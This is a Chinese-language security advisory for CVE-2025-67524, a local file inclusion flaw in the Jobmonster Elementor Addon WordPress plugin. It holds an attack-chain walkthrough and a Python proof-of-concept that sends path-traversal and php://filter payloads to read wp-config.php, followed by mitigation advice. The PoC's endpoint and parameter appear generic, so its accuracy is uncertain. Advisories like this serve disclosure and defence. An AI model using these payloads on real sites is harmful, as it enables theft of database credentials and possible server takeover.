CVE-2025-67524 CVSS 7.5 高危

CVE-2025-67524: Jobmonster Elementor Addon本地文件包含漏洞

披露日期: 2025-12-09

来源: [email protected]

漏洞信息

漏洞编号

CVE-2025-67524

漏洞类型

本地文件包含(Local File Inclusion)

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Jobmonster Elementor Addon (WordPress插件)

漏洞概述

CVE-2025-67524是WordPress插件Jobmonster Elementor Addon中的一个高危安全漏洞，CVSS评分7.5，属于高危级别。该漏洞属于PHP本地文件包含(Local File Inclusion, LFI)类型，存在于插件的文件包含逻辑中。由于插件对用户输入的文件路径参数缺乏充分的验证和过滤，攻击者可以通过构造恶意请求，诱导应用程序包含服务器上的任意本地文件。这可能导致敏感信息泄露，如配置文件、凭据文件、系统文件等。在某些配置下，攻击者甚至可能通过包含恶意文件实现远程代码执行，从而完全控制受影响的服务器。该漏洞需要低权限认证即可利用，且无需用户交互便可发起攻击，显示出较高的可利用性。

技术细节

该漏洞源于Jobmonster Elementor Addon插件在处理文件包含请求时，对用户可控的输入参数（如file、template、page等参数）缺乏严格的路径验证。攻击者可以利用路径遍历技术（如使用../字符序列）跳出预期的目录，访问服务器上的敏感文件。例如，攻击者可能通过构造类似?file=../../wp-config.php的请求来读取WordPress配置文件，从而获取数据库凭据和加密密钥等敏感信息。在某些情况下，如果服务器配置允许，攻击者还可能利用PHP的协议包装器（如php://filter）读取任意文件内容，或通过文件包含结合日志文件写入实现远程代码执行。漏洞的根本原因在于使用了不安全的include/require语句，且未对输入路径进行规范化(canonicalization)和白名单验证。

攻击链分析

STEP 1

步骤1

攻击者识别目标网站使用的WordPress CMS，并确认安装了Jobmonster Elementor Addon插件（版本<=1.1.4）

STEP 2

步骤2

攻击者通过目录遍历或直接访问插件的文件包含端点，构造恶意请求参数

STEP 3

步骤3

发送包含路径遍历载荷的请求，如?file=../../wp-config.php，尝试读取敏感配置文件

STEP 4

步骤4

成功读取wp-config.php等文件，获取数据库凭据、API密钥等敏感信息

STEP 5

步骤5

利用获取的凭据进一步入侵数据库，或通过日志文件包含等方式实现远程代码执行

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-67524 PoC - Jobmonster Elementor Addon LFI
# Target: WordPress site with vulnerable Jobmonster Elementor Addon plugin (<=1.1.4)

import requests
import urllib.parse

target = "http://target-site.com"

# Read wp-config.php (sensitive configuration file)
payload = "../../wp-config.php"
params = {
    "file": payload
}

print(f"[*] Attempting to read wp-config.php via LFI...")
response = requests.get(f"{target}/wp-admin/admin-ajax.php", params=params)

if "DB_NAME" in response.text or "define(" in response.text:
    print("[+] Successfully read wp-config.php!")
    print(response.text[:500])
else:
    print("[-] Failed to read file. Trying alternate endpoint...")
    
# Alternative: Try with PHP wrapper to read source
payload_b64 = "php://filter/read=convert.base64-encode/resource=../../wp-config.php"
params_b64 = {
    "file": payload_b64
}

response_b64 = requests.get(f"{target}/wp-admin/admin-ajax.php", params=params_b64)
print(f"[*] Response status: {response_b64.status_code}")

影响范围

Jobmonster Elementor Addon <= 1.1.4

防御指南

临时缓解措施

在官方补丁发布前，可采取以下临时措施：1) 临时禁用Jobmonster Elementor Addon插件；2) 通过WAF规则阻止包含file、template等参数的请求；3) 限制Web用户对wp-config.php等敏感文件的访问权限；4) 启用PHP的open_basedir限制，防止跨目录访问。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表